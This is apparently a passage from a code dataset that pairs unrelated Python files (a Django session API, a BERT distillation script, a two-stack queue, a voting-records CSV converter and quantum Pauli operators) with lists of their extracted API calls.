'from time import time\n'), ((1945, 1969), 'grouper.fe.template_util.print_date', 'print_date', (['p.created_on'], {}), '(p.created_on)\n', (1955, 1969), False, 'from grouper.fe.template_util import print_date\n'), ((2075, 2108), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions"""'], {}), "(frontend_url, '/permissions')\n", (2078, 2108), False, 'from tests.url_util import url\n'), ((4120, 4144), 'grouper.fe.template_util.print_date', 'print_date', (['p.created_on'], {}), '(p.created_on)\n', (4130, 4144), False, 'from grouper.fe.template_util import print_date\n'), ((4249, 4299), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions?limit=1&offset=1"""'], {}), "(frontend_url, '/permissions?limit=1&offset=1')\n", (4252, 4299), False, 'from tests.url_util import url\n'), ((4716, 4767), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions?limit=10&offset=2"""'], {}), "(frontend_url, '/permissions?limit=10&offset=2')\n", (4719, 4767), False, 'from tests.url_util import url\n'), ((5271, 5304), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions"""'], {}), "(frontend_url, '/permissions')\n", (5274, 5304), False, 'from tests.url_util import url\n'), ((5589, 5634), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions?refresh=yes"""'], {}), "(frontend_url, '/permissions?refresh=yes')\n", (5592, 5634), False, 'from tests.url_util import url\n'), ((955, 961), 'time.time', 'time', ([], {}), '()\n', (959, 961), False, 'from time import time\n'), ((3294, 3318), 'grouper.fe.template_util.print_date', 'print_date', (['p.created_on'], {}), '(p.created_on)\n', (3304, 3318), False, 'from grouper.fe.template_util import print_date\n')]
|
import os
from django.shortcuts import render
from django.conf import settings
from django.http import HttpResponse
from . import database
from .models import PageView
from rest_framework.viewsets import GenericViewSet
from rest_framework.mixins import (RetrieveModelMixin, CreateModelMixin, ListModelMixin, RetrieveModelMixin,DestroyModelMixin,UpdateModelMixin)
from primesession.serializer import Session,SessionSerializer
def index(request):
hostname = os.getenv('HOSTNAME', 'unknown')
PageView.objects.create(hostname=hostname)
return render(request, 'primesession/index.html', {
'hostname': hostname,
'database': database.info(),
'count': PageView.objects.count()
})
def health(request):
return HttpResponse(PageView.objects.count())
class SessionViewSet(RetrieveModelMixin, CreateModelMixin, ListModelMixin,DestroyModelMixin,UpdateModelMixin, GenericViewSet):
queryset = Session.objects.all()
serializer_class = SessionSerializer
lookup_field = 'sessionid'
class TokenViewSet(RetrieveModelMixin, CreateModelMixin, ListModelMixin,DestroyModelMixin,UpdateModelMixin, GenericViewSet):
queryset = Session.objects.all()
serializer_class = SessionSerializer
lookup_field = 'token'
|
[
"primesession.serializer.Session.objects.all",
"os.getenv"
] |
[((465, 497), 'os.getenv', 'os.getenv', (['"""HOSTNAME"""', '"""unknown"""'], {}), "('HOSTNAME', 'unknown')\n", (474, 497), False, 'import os\n'), ((934, 955), 'primesession.serializer.Session.objects.all', 'Session.objects.all', ([], {}), '()\n', (953, 955), False, 'from primesession.serializer import Session, SessionSerializer\n'), ((1170, 1191), 'primesession.serializer.Session.objects.all', 'Session.objects.all', ([], {}), '()\n', (1189, 1191), False, 'from primesession.serializer import Session, SessionSerializer\n')]
|
import logging
logging.basicConfig(
format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.INFO,
)
logger = logging.getLogger("Main")
import os,random
import numpy as np
import torch
from utils_glue import output_modes, processors
from pytorch_pretrained_bert.my_modeling import BertConfig
from pytorch_pretrained_bert import BertTokenizer
from optimization import BERTAdam
import config
from utils import divide_parameters, load_and_cache_examples
from modeling import BertForGLUESimple,BertForGLUESimpleAdaptor
from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler
from tqdm import tqdm
from utils_glue import compute_metrics
from functools import partial
def args_check(args):
if os.path.exists(args.output_dir) and os.listdir(args.output_dir):
logger.warning("Output directory () already exists and is not empty.")
if args.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
args.gradient_accumulation_steps))
if not args.do_train and not args.do_predict:
raise ValueError("At least one of `do_train` or `do_predict` must be True.")
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count() if not args.no_cuda else 0
else:
device = torch.device("cuda", args.local_rank)
n_gpu = 1
torch.distributed.init_process_group(backend='nccl')
logger.info("device %s n_gpu %d distributed training %r", device, n_gpu, bool(args.local_rank != -1))
args.n_gpu = n_gpu
args.device = device
return device, n_gpu
def predict(model,eval_datasets,step,args):
eval_task_names = ("mnli", "mnli-mm") if args.task_name == "mnli" else (args.task_name,)
eval_output_dir = args.output_dir
results = {}
for eval_task,eval_dataset in zip(eval_task_names, eval_datasets):
if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:
os.makedirs(eval_output_dir)
logger.info("Predicting...")
logger.info("***** Running predictions *****")
logger.info(" task name = %s", eval_task)
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.predict_batch_size)
eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.predict_batch_size)
model.eval()
pred_logits = []
label_ids = []
for batch in tqdm(eval_dataloader, desc="Evaluating", disable=None):
input_ids, input_mask, segment_ids, labels = batch
input_ids = input_ids.to(args.device)
input_mask = input_mask.to(args.device)
segment_ids = segment_ids.to(args.device)
with torch.no_grad():
logits = model(input_ids, input_mask, segment_ids)
cpu_logits = logits.detach().cpu()
for i in range(len(cpu_logits)):
pred_logits.append(cpu_logits[i].numpy())
label_ids.append(labels[i])
pred_logits = np.array(pred_logits)
label_ids = np.array(label_ids)
if args.output_mode == "classification":
preds = np.argmax(pred_logits, axis=1)
else: # args.output_mode == "regression":
preds = np.squeeze(pred_logits)
result = compute_metrics(eval_task, preds, label_ids)
logger.info(f"task:,{eval_task}")
logger.info(f"result: {result}")
results.update(result)
output_eval_file = os.path.join(eval_output_dir, "eval_results-%s.txt" % eval_task)
with open(output_eval_file, "a") as writer:
logger.info("***** Eval results {} task {} *****".format(step, eval_task))
writer.write("step: %d ****\n " % step)
for key in sorted(results.keys()):
logger.info("%s = %s", key, str(results[key]))
writer.write("%s = %s\n" % (key, str(results[key])))
model.train()
return results
def main():
#parse arguments
config.parse()
args = config.args
for k,v in vars(args).items():
logger.info(f"{k}:{v}")
#set seeds
torch.manual_seed(args.random_seed)
torch.cuda.manual_seed_all(args.random_seed)
np.random.seed(args.random_seed)
random.seed(args.random_seed)
#arguments check
device, n_gpu = args_check(args)
os.makedirs(args.output_dir, exist_ok=True)
forward_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)
args.forward_batch_size = forward_batch_size
#load bert config
bert_config_T = BertConfig.from_json_file(args.bert_config_file_T)
bert_config_S = BertConfig.from_json_file(args.bert_config_file_S)
assert args.max_seq_length <= bert_config_T.max_position_embeddings
assert args.max_seq_length <= bert_config_S.max_position_embeddings
#Prepare GLUE task
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
#read data
train_dataset = None
eval_datasets = None
num_train_steps = None
tokenizer = BertTokenizer(vocab_file=args.vocab_file, do_lower_case=args.do_lower_case)
if args.do_train:
train_dataset = load_and_cache_examples(args, args.task_name, tokenizer, evaluate=False)
if args.aux_task_name:
aux_train_dataset = load_and_cache_examples(args, args.aux_task_name, tokenizer, evaluate=False, is_aux=True)
train_dataset = torch.utils.data.ConcatDataset([train_dataset, aux_train_dataset])
num_train_steps = int(len(train_dataset)/args.train_batch_size) * args.num_train_epochs
if args.do_predict:
eval_datasets = []
eval_task_names = ("mnli", "mnli-mm") if args.task_name == "mnli" else (args.task_name,)
for eval_task in eval_task_names:
eval_datasets.append(load_and_cache_examples(args, eval_task, tokenizer, evaluate=True))
logger.info("Data loaded")
#Build Model and load checkpoint
model_S = BertForGLUESimple(bert_config_S, num_labels=num_labels,args=args)
#Load teacher
if args.tuned_checkpoint_Ts:
model_Ts = [BertForGLUESimple(bert_config_T, num_labels=num_labels,args=args) for i in range(len(args.tuned_checkpoint_Ts))]
for model_T, ckpt_T in zip(model_Ts,args.tuned_checkpoint_Ts):
logger.info("Load state dict %s" % ckpt_T)
state_dict_T = torch.load(ckpt_T, map_location='cpu')
model_T.load_state_dict(state_dict_T)
model_T.eval()
else:
assert args.do_predict is True
#Load student
if args.load_model_type=='bert':
assert args.init_checkpoint_S is not None
state_dict_S = torch.load(args.init_checkpoint_S, map_location='cpu')
state_weight = {k[5:]:v for k,v in state_dict_S.items() if k.startswith('bert.')}
missing_keys,_ = model_S.bert.load_state_dict(state_weight,strict=False)
assert len(missing_keys)==0
elif args.load_model_type=='all':
assert args.tuned_checkpoint_S is not None
state_dict_S = torch.load(args.tuned_checkpoint_S,map_location='cpu')
model_S.load_state_dict(state_dict_S)
else:
logger.info("Model is randomly initialized.")
if args.do_train:
for model_T in model_Ts:
model_T.to(device)
model_S.to(device)
if args.local_rank != -1 or n_gpu > 1:
if args.local_rank != -1:
raise NotImplementedError
elif n_gpu > 1:
if args.do_train:
model_Ts = [torch.nn.DataParallel(model_T) for model_T in model_Ts]
model_S = torch.nn.DataParallel(model_S) #,output_device=n_gpu-1)
if args.do_train:
#parameters
params = list(model_S.named_parameters())
all_trainable_params = divide_parameters(params, lr=args.learning_rate)
logger.info("Length of all_trainable_params: %d", len(all_trainable_params))
optimizer = BERTAdam(all_trainable_params,lr=args.learning_rate,
warmup=args.warmup_proportion,t_total=num_train_steps,schedule=args.schedule,
s_opt1=args.s_opt1, s_opt2=args.s_opt2, s_opt3=args.s_opt3)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Forward batch size = %d", forward_batch_size)
logger.info(" Num backward steps = %d", num_train_steps)
########### DISTILLATION ###########
train_config = TrainingConfig(
gradient_accumulation_steps = args.gradient_accumulation_steps,
ckpt_frequency = args.ckpt_frequency,
log_dir = args.output_dir,
output_dir = args.output_dir,
device = args.device)
distill_config = DistillationConfig(
temperature = args.temperature,
kd_loss_type = 'ce')
logger.info(f"{train_config}")
logger.info(f"{distill_config}")
adaptor = partial(BertForGLUESimpleAdaptor, no_logits=False, no_mask = False)
distiller = MultiTeacherDistiller(train_config = train_config,
distill_config = distill_config,
model_T = model_Ts, model_S = model_S,
adaptor_T=adaptor,
adaptor_S=adaptor)
if args.local_rank == -1:
train_sampler = RandomSampler(train_dataset)
else:
raise NotImplementedError
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.forward_batch_size,drop_last=True)
callback_func = partial(predict, eval_datasets=eval_datasets, args=args)
with distiller:
distiller.train(optimizer, scheduler=None, dataloader=train_dataloader,
num_epochs=args.num_train_epochs, callback=callback_func)
if not args.do_train and args.do_predict:
res = predict(model_S,eval_datasets,step=0,args=args)
print (res)
if __name__ == "__main__":
main()
|
[
"numpy.random.seed",
"torch.utils.data.RandomSampler",
"numpy.argmax",
"pytorch_pretrained_bert.BertTokenizer",
"textbrewer.MultiTeacherDistiller",
"torch.cuda.device_count",
"config.parse",
"pytorch_pretrained_bert.my_modeling.BertConfig.from_json_file",
"torch.device",
"modeling.BertForGLUESimple",
"utils_glue.compute_metrics",
"os.path.join",
"torch.no_grad",
"torch.utils.data.DataLoader",
"textbrewer.TrainingConfig",
"torch.load",
"os.path.exists",
"utils.load_and_cache_examples",
"random.seed",
"torch.utils.data.SequentialSampler",
"functools.partial",
"tqdm.tqdm",
"torch.utils.data.ConcatDataset",
"torch.manual_seed",
"torch.cuda.is_available",
"numpy.squeeze",
"os.listdir",
"torch.distributed.init_process_group",
"os.makedirs",
"logging.basicConfig",
"textbrewer.DistillationConfig",
"torch.utils.data.DistributedSampler",
"torch.cuda.manual_seed_all",
"numpy.array",
"optimization.BERTAdam",
"torch.nn.DataParallel",
"logging.getLogger",
"utils.divide_parameters"
] |
[((15, 157), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(levelname)s - %(name)s - %(message)s"""', 'datefmt': '"""%Y/%m/%d %H:%M:%S"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt=\n '%Y/%m/%d %H:%M:%S', level=logging.INFO)\n", (34, 157), False, 'import logging\n'), ((176, 201), 'logging.getLogger', 'logging.getLogger', (['"""Main"""'], {}), "('Main')\n", (193, 201), False, 'import logging\n'), ((3946, 4010), 'os.path.join', 'os.path.join', (['eval_output_dir', "('eval_results-%s.txt' % eval_task)"], {}), "(eval_output_dir, 'eval_results-%s.txt' % eval_task)\n", (3958, 4010), False, 'import os, random\n'), ((4432, 4446), 'config.parse', 'config.parse', ([], {}), '()\n', (4444, 4446), False, 'import config\n'), ((4556, 4591), 'torch.manual_seed', 'torch.manual_seed', (['args.random_seed'], {}), '(args.random_seed)\n', (4573, 4591), False, 'import torch\n'), ((4596, 4640), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['args.random_seed'], {}), '(args.random_seed)\n', (4622, 4640), False, 'import torch\n'), ((4645, 4677), 'numpy.random.seed', 'np.random.seed', (['args.random_seed'], {}), '(args.random_seed)\n', (4659, 4677), True, 'import numpy as np\n'), ((4682, 4711), 'random.seed', 'random.seed', (['args.random_seed'], {}), '(args.random_seed)\n', (4693, 4711), False, 'import os, random\n'), ((4775, 4818), 'os.makedirs', 'os.makedirs', (['args.output_dir'], {'exist_ok': '(True)'}), '(args.output_dir, exist_ok=True)\n', (4786, 4818), False, 'import os, random\n'), ((4998, 5048), 'pytorch_pretrained_bert.my_modeling.BertConfig.from_json_file', 'BertConfig.from_json_file', (['args.bert_config_file_T'], {}), '(args.bert_config_file_T)\n', (5023, 5048), False, 'from pytorch_pretrained_bert.my_modeling import BertConfig\n'), ((5069, 5119), 'pytorch_pretrained_bert.my_modeling.BertConfig.from_json_file', 'BertConfig.from_json_file', (['args.bert_config_file_S'], {}), '(args.bert_config_file_S)\n', (5094, 5119), False, 'from pytorch_pretrained_bert.my_modeling import BertConfig\n'), ((5568, 5643), 'pytorch_pretrained_bert.BertTokenizer', 'BertTokenizer', ([], {'vocab_file': 'args.vocab_file', 'do_lower_case': 'args.do_lower_case'}), '(vocab_file=args.vocab_file, do_lower_case=args.do_lower_case)\n', (5581, 5643), False, 'from pytorch_pretrained_bert import BertTokenizer\n'), ((6483, 6549), 'modeling.BertForGLUESimple', 'BertForGLUESimple', (['bert_config_S'], {'num_labels': 'num_labels', 'args': 'args'}), '(bert_config_S, num_labels=num_labels, args=args)\n', (6500, 6549), False, 'from modeling import BertForGLUESimple, BertForGLUESimpleAdaptor\n'), ((895, 926), 'os.path.exists', 'os.path.exists', (['args.output_dir'], {}), '(args.output_dir)\n', (909, 926), False, 'import os, random\n'), ((931, 958), 'os.listdir', 'os.listdir', (['args.output_dir'], {}), '(args.output_dir)\n', (941, 958), False, 'import os, random\n'), ((1625, 1662), 'torch.device', 'torch.device', (['"""cuda"""', 'args.local_rank'], {}), "('cuda', args.local_rank)\n", (1637, 1662), False, 'import torch\n'), ((1689, 1741), 'torch.distributed.init_process_group', 'torch.distributed.init_process_group', ([], {'backend': '"""nccl"""'}), "(backend='nccl')\n", (1725, 1741), False, 'import torch\n'), ((2720, 2807), 'torch.utils.data.DataLoader', 'DataLoader', (['eval_dataset'], {'sampler': 'eval_sampler', 'batch_size': 'args.predict_batch_size'}), '(eval_dataset, sampler=eval_sampler, batch_size=args.\n predict_batch_size)\n', (2730, 2807), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((2894, 2948), 'tqdm.tqdm', 'tqdm', (['eval_dataloader'], {'desc': '"""Evaluating"""', 'disable': 'None'}), "(eval_dataloader, desc='Evaluating', disable=None)\n", (2898, 2948), False, 'from tqdm import tqdm\n'), ((3487, 3508), 'numpy.array', 'np.array', (['pred_logits'], {}), '(pred_logits)\n', (3495, 3508), True, 'import numpy as np\n'), ((3531, 3550), 'numpy.array', 'np.array', (['label_ids'], {}), '(label_ids)\n', (3539, 3550), True, 'import numpy as np\n'), ((3763, 3807), 'utils_glue.compute_metrics', 'compute_metrics', (['eval_task', 'preds', 'label_ids'], {}), '(eval_task, preds, label_ids)\n', (3778, 3807), False, 'from utils_glue import compute_metrics\n'), ((5690, 5762), 'utils.load_and_cache_examples', 'load_and_cache_examples', (['args', 'args.task_name', 'tokenizer'], {'evaluate': '(False)'}), '(args, args.task_name, tokenizer, evaluate=False)\n', (5713, 5762), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((7179, 7233), 'torch.load', 'torch.load', (['args.init_checkpoint_S'], {'map_location': '"""cpu"""'}), "(args.init_checkpoint_S, map_location='cpu')\n", (7189, 7233), False, 'import torch\n'), ((8283, 8331), 'utils.divide_parameters', 'divide_parameters', (['params'], {'lr': 'args.learning_rate'}), '(params, lr=args.learning_rate)\n', (8300, 8331), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((8438, 8640), 'optimization.BERTAdam', 'BERTAdam', (['all_trainable_params'], {'lr': 'args.learning_rate', 'warmup': 'args.warmup_proportion', 't_total': 'num_train_steps', 'schedule': 'args.schedule', 's_opt1': 'args.s_opt1', 's_opt2': 'args.s_opt2', 's_opt3': 'args.s_opt3'}), '(all_trainable_params, lr=args.learning_rate, warmup=args.\n warmup_proportion, t_total=num_train_steps, schedule=args.schedule,\n s_opt1=args.s_opt1, s_opt2=args.s_opt2, s_opt3=args.s_opt3)\n', (8446, 8640), False, 'from optimization import BERTAdam\n'), ((9007, 9201), 'textbrewer.TrainingConfig', 'TrainingConfig', ([], {'gradient_accumulation_steps': 'args.gradient_accumulation_steps', 'ckpt_frequency': 'args.ckpt_frequency', 'log_dir': 'args.output_dir', 'output_dir': 'args.output_dir', 'device': 'args.device'}), '(gradient_accumulation_steps=args.gradient_accumulation_steps,\n ckpt_frequency=args.ckpt_frequency, log_dir=args.output_dir, output_dir\n =args.output_dir, device=args.device)\n', (9021, 9201), False, 'from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller\n'), ((9290, 9357), 'textbrewer.DistillationConfig', 'DistillationConfig', ([], {'temperature': 'args.temperature', 'kd_loss_type': '"""ce"""'}), "(temperature=args.temperature, kd_loss_type='ce')\n", (9308, 9357), False, 'from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller\n'), ((9486, 9551), 'functools.partial', 'partial', (['BertForGLUESimpleAdaptor'], {'no_logits': '(False)', 'no_mask': '(False)'}), '(BertForGLUESimpleAdaptor, no_logits=False, no_mask=False)\n', (9493, 9551), False, 'from functools import partial\n'), ((9576, 9737), 'textbrewer.MultiTeacherDistiller', 'MultiTeacherDistiller', ([], {'train_config': 'train_config', 'distill_config': 'distill_config', 'model_T': 'model_Ts', 'model_S': 'model_S', 'adaptor_T': 'adaptor', 'adaptor_S': 'adaptor'}), '(train_config=train_config, distill_config=\n distill_config, model_T=model_Ts, model_S=model_S, adaptor_T=adaptor,\n adaptor_S=adaptor)\n', (9597, 9737), False, 'from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller\n'), ((10019, 10124), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'sampler': 'train_sampler', 'batch_size': 'args.forward_batch_size', 'drop_last': '(True)'}), '(train_dataset, sampler=train_sampler, batch_size=args.\n forward_batch_size, drop_last=True)\n', (10029, 10124), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((10143, 10199), 'functools.partial', 'partial', (['predict'], {'eval_datasets': 'eval_datasets', 'args': 'args'}), '(predict, eval_datasets=eval_datasets, args=args)\n', (10150, 10199), False, 'from functools import partial\n'), ((1545, 1570), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (1568, 1570), False, 'import torch\n'), ((2276, 2304), 'os.makedirs', 'os.makedirs', (['eval_output_dir'], {}), '(eval_output_dir)\n', (2287, 2304), False, 'import os, random\n'), ((2599, 2630), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['eval_dataset'], {}), '(eval_dataset)\n', (2616, 2630), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((2661, 2693), 'torch.utils.data.DistributedSampler', 'DistributedSampler', (['eval_dataset'], {}), '(eval_dataset)\n', (2679, 2693), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((3621, 3651), 'numpy.argmax', 'np.argmax', (['pred_logits'], {'axis': '(1)'}), '(pred_logits, axis=1)\n', (3630, 3651), True, 'import numpy as np\n'), ((3722, 3745), 'numpy.squeeze', 'np.squeeze', (['pred_logits'], {}), '(pred_logits)\n', (3732, 3745), True, 'import numpy as np\n'), ((5826, 5919), 'utils.load_and_cache_examples', 'load_and_cache_examples', (['args', 'args.aux_task_name', 'tokenizer'], {'evaluate': '(False)', 'is_aux': '(True)'}), '(args, args.aux_task_name, tokenizer, evaluate=False,\n is_aux=True)\n', (5849, 5919), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((5944, 6010), 'torch.utils.data.ConcatDataset', 'torch.utils.data.ConcatDataset', (['[train_dataset, aux_train_dataset]'], {}), '([train_dataset, aux_train_dataset])\n', (5974, 6010), False, 'import torch\n'), ((6620, 6686), 'modeling.BertForGLUESimple', 'BertForGLUESimple', (['bert_config_T'], {'num_labels': 'num_labels', 'args': 'args'}), '(bert_config_T, num_labels=num_labels, args=args)\n', (6637, 6686), False, 'from modeling import BertForGLUESimple, BertForGLUESimpleAdaptor\n'), ((6886, 6924), 'torch.load', 'torch.load', (['ckpt_T'], {'map_location': '"""cpu"""'}), "(ckpt_T, map_location='cpu')\n", (6896, 6924), False, 'import torch\n'), ((7553, 7608), 'torch.load', 'torch.load', (['args.tuned_checkpoint_S'], {'map_location': '"""cpu"""'}), "(args.tuned_checkpoint_S, map_location='cpu')\n", (7563, 7608), False, 'import torch\n'), ((9911, 9939), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_dataset'], {}), '(train_dataset)\n', (9924, 9939), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((2200, 2231), 'os.path.exists', 'os.path.exists', (['eval_output_dir'], {}), '(eval_output_dir)\n', (2214, 2231), False, 'import os, random\n'), ((3186, 3201), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3199, 3201), False, 'import torch\n'), ((6330, 6396), 'utils.load_and_cache_examples', 'load_and_cache_examples', (['args', 'eval_task', 'tokenizer'], {'evaluate': '(True)'}), '(args, eval_task, tokenizer, evaluate=True)\n', (6353, 6396), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((8103, 8133), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model_S'], {}), '(model_S)\n', (8124, 8133), False, 'import torch\n'), ((1470, 1495), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1493, 1495), False, 'import torch\n'), ((8025, 8055), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model_T'], {}), '(model_T)\n', (8046, 8055), False, 'import torch\n')]
|
import unittest
"""
Implement a queue with 2 stacks.
Your queue should have an enqueue and a dequeue function and it should be "first in first out" (FIFO).
"""
class SelfImplementQueue:
stack1 = []
stack2 = []
def __init__(self):
pass
def enqueue(self, item):
"""
Adds a new item to the queue.
:param item:
The item to add to the queue.
"""
self.stack1.append(item)
def dequeue(self):
"""
Remove an item from the queue.
:param item:
The item to remove from the queue.
"""
# Move all values to stack2, in reverse order.
for index in range(len(self.stack1)):
value = self.stack1.pop()
self.stack2.append(value)
# Remove the first value from the stack.
self.stack2.pop()
# Return the values to stack1.
for index in range(len(self.stack2)):
value = self.stack2.pop()
self.stack1.append(value)
def __str__(self):
return str(self.stack1)
class TestList(unittest.TestCase):
def test_right(self):
queue = SelfImplementQueue()
queue.enqueue(1)
queue.enqueue(2)
queue.enqueue(3)
queue.dequeue()
queue.enqueue(4)
self.assertEqual(str(queue), '[2, 3, 4]')
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main"
] |
[((1383, 1398), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1396, 1398), False, 'import unittest\n')]
|
import csv
import json
import itertools
PARTIES = ['conservative', 'liberal', 'ndp', 'green', 'bloc']
BASE_URL = 'https://www.ourcommons.ca/Parliamentarians/en/votes/%d/%d/%d/'
if __name__ == '__main__':
headers = ['Date', 'Parliament Number', 'Session Number', 'Decision Number',
'Result', 'Decision Type', 'Decision Subject', 'Num Yeas', 'Num Nays', 'Num Paired',
'Conservative Yeas', 'Conservative Nays', 'Liberal Yeas', 'Liberal Nays',
'NDP Yeas', 'NDP Nays', 'Green Yeas', 'Green Nays', 'Bloc Yeas', 'Bloc Nays', 'URL']
for party in PARTIES:
headers.append(party.capitalize() + ' Defections')
for two_party_coalitions in itertools.combinations(PARTIES, 2):
headers.append('%s-%s Coalition' %
(two_party_coalitions[0].capitalize(), two_party_coalitions[1].capitalize()))
for three_party_coalitions in itertools.combinations(PARTIES, 3):
headers.append('%s-%s-%s Coalition' %
(three_party_coalitions[0].capitalize(), three_party_coalitions[1].capitalize(),
three_party_coalitions[2].capitalize()))
csv_output = []
with open("voting_records.json") as f:
for entry in json.load(f):
csv_row = [entry['date'], entry['parliament_number'], entry['session_number'],
entry['decision_number'], entry['result'], entry['decision_type'], entry['decision_subject'],
entry['num_yeas'], entry['num_nays'], entry['num_paired'],
entry['conservative_yeas'], entry['conservative_nays'], entry['liberal_yeas'], entry['liberal_nays'],
entry['ndp_yeas'], entry['ndp_nays'], entry['green_yeas'],
entry['green_nays'], entry['bloc_yeas'], entry['bloc_nays']]
csv_row.append(BASE_URL % (entry['parliament_number'],entry['session_number'],entry['decision_number']))
# Defections
for party in PARTIES:
if entry[party+'_yeas'] > 0 and entry[party+'_nays'] > 0:
csv_row.append('1')
else:
csv_row.append('0')
# 2 party coalitions
for two_party_coalitions in itertools.combinations(PARTIES, 2):
if (entry[two_party_coalitions[0]+'_yeas'] > entry[two_party_coalitions[0]+'_nays'] and
entry[two_party_coalitions[1]+'_yeas'] > entry[two_party_coalitions[1]+'_nays']):
csv_row.append('1')
else:
csv_row.append('0')
# 3 party coalitions
for three_party_coalitions in itertools.combinations(PARTIES, 3):
if (entry[three_party_coalitions[0]+'_yeas'] > entry[three_party_coalitions[0]+'_nays'] and
entry[three_party_coalitions[1]+'_yeas'] > entry[three_party_coalitions[1]+'_nays'] and
entry[three_party_coalitions[2]+'_yeas'] > entry[three_party_coalitions[2]+'_nays']):
csv_row.append('1')
else:
csv_row.append('0')
csv_output.append([str(data) for data in csv_row])
## Sort by date
csv_output.sort(key=lambda x: x[0])
csv_output.insert(0, headers)
with open("processed_data.csv", "w") as outfile:
writer = csv.writer(outfile)
writer.writerows(csv_output)
|
[
"itertools.combinations",
"json.load",
"csv.writer"
] |
[((639, 673), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(2)'], {}), '(PARTIES, 2)\n', (661, 673), False, 'import itertools\n'), ((825, 859), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(3)'], {}), '(PARTIES, 3)\n', (847, 859), False, 'import itertools\n'), ((1105, 1117), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1114, 1117), False, 'import json\n'), ((2834, 2853), 'csv.writer', 'csv.writer', (['outfile'], {}), '(outfile)\n', (2844, 2853), False, 'import csv\n'), ((1922, 1956), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(2)'], {}), '(PARTIES, 2)\n', (1944, 1956), False, 'import itertools\n'), ((2255, 2289), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(3)'], {}), '(PARTIES, 3)\n', (2277, 2289), False, 'import itertools\n')]
|
import numpy as np
import random,copy
from scipy.sparse import csr_matrix
import scipy.integrate
from numpy import linalg
import time
import settings
import math
####PAULI OPERATORS####
def sigma_x_operator(basis_vector,indices,pos_sigma=-1):
"""Operator that creates the matrix representation of sigma_x."""
M=sigma_moins_operator(basis_vector,indices,pos_sigma=-1)
return M+np.transpose(M)
def sigma_moins_operator(basis_vector,indices,pos_sigma):
"""
Operator that creates the matrix representation of sigma_+
we create an overloading variable pos_sigma, that denotes the position of the sigma_+
if pos_sigma=-1, global operation.
"""
dim=len(basis_vector)
sigma_x_matrix=np.zeros((dim, dim)) #creation of the output array
for ii in range(dim-1): #Not optimized. We need to implement a 'for basis_vector_loc in basis_vector'
basis_vector_ii=basis_vector[ii]
(n_initial,n_final)=get_indices(basis_vector[ii],indices)
#we look for possible connections in a restricted set, in order to reduce the computation
#time. The function get_indices will return the indices between which to look.
if n_initial<0. or n_final<0.:
continue
for jj in range(n_initial,n_final):
basis_vector_jj=basis_vector[jj]
if pos_sigma>-0.1: #Local sigma_x
loc1=list(copy.copy(basis_vector_ii))
loc1.append(pos_sigma) #we add the index j to the smallest list
if set(loc1) == set(basis_vector_jj):
sigma_x_matrix[ii,jj]=1.
continue
else: #Global sigma_x
if(set(basis_vector_ii).issubset(set(basis_vector_jj))): #here issubset is sufficient because we know that basis_vector_ii and
sigma_x_matrix[ii,jj]=1. #basis_vector_jj only differ by one excitation (thanks to get_indices).
return sigma_x_matrix
def sigma_z_operator(basis_vector,pos=-1):
"""
Operator that creates the matrix representation of sigma_z. As sigma^z is diagonal in the computational basis,
we will only return a vector-type array and later apply element-wise multiplication with the wavefunction
if pos=-1, global operation.
"""
dim=len(basis_vector)
sigma_z_matrix=np.zeros(dim)
